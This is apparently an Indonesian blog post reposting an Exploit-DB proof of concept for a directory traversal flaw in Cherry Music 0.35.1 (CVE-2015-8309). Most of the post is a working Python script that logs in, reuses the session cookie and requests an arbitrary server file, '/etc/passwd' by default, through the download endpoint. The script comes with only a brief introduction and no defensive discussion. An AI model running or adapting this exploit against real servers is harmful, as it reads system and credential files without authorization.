Selasa, 25 Oktober 2016

Cherry Music 0.35.1 - Arbitrary File Disclosure - Exploit

Cherry Music v0.35.1 directory traversal vulnerability allows authenticated users to download arbitrary files

Selamat sore kawan! kali ini admin akan berbagi sebuah artikel tentang exploit. Silahkan di simak ya.


Deskripsi author exploit:

# Date: 11-09-2016
# Exploit Author: feedersec
# Contact: feedersec@gmail.com
# Vendor Homepage: http://www.fomori.org/cherrymusic/index.html
# Version: 0.35.1
# Tested on: ubuntu 14.04 LTS
# CVE : CVE-2015-8309
Exploit yang digunakan yaitu Python

Proof of Concept:

import urllib2, cookielib, urllib

#set parameters here
username = 'admin'
password = 'Password01'
baseUrl = 'http://localhost:8080/'
targetFile = '/etc/passwd'
downloadFileName = 'result.zip'
####

cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
params = urllib.urlencode({'username': username, 'password': password, 'login': 'login'})
req = urllib2.Request(baseUrl, params)
response = opener.open(req)
for c in cj:
  if c.name == "session_id":
    session_id = c.value

opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
opener.addheaders.append(('Cookie', 'session_id=' + session_id))
params = urllib.urlencode({'value': '["' + targetFile + '"]'})
request = urllib2.Request(baseUrl + "download", params)
response = opener.open(request).read()
with open(downloadFileName, 'wb') as zipFile:
    zipFile.write(response);

Sekian tutorial yang bisa saya bagikan. Mohon maaf jika ada kesalahan kata ^_^

Source: Exploit DB - Cherry Music 0.35.1 - LFD Exploit

Vulnerable App: Cherry Music 0.35.1

freebitcoin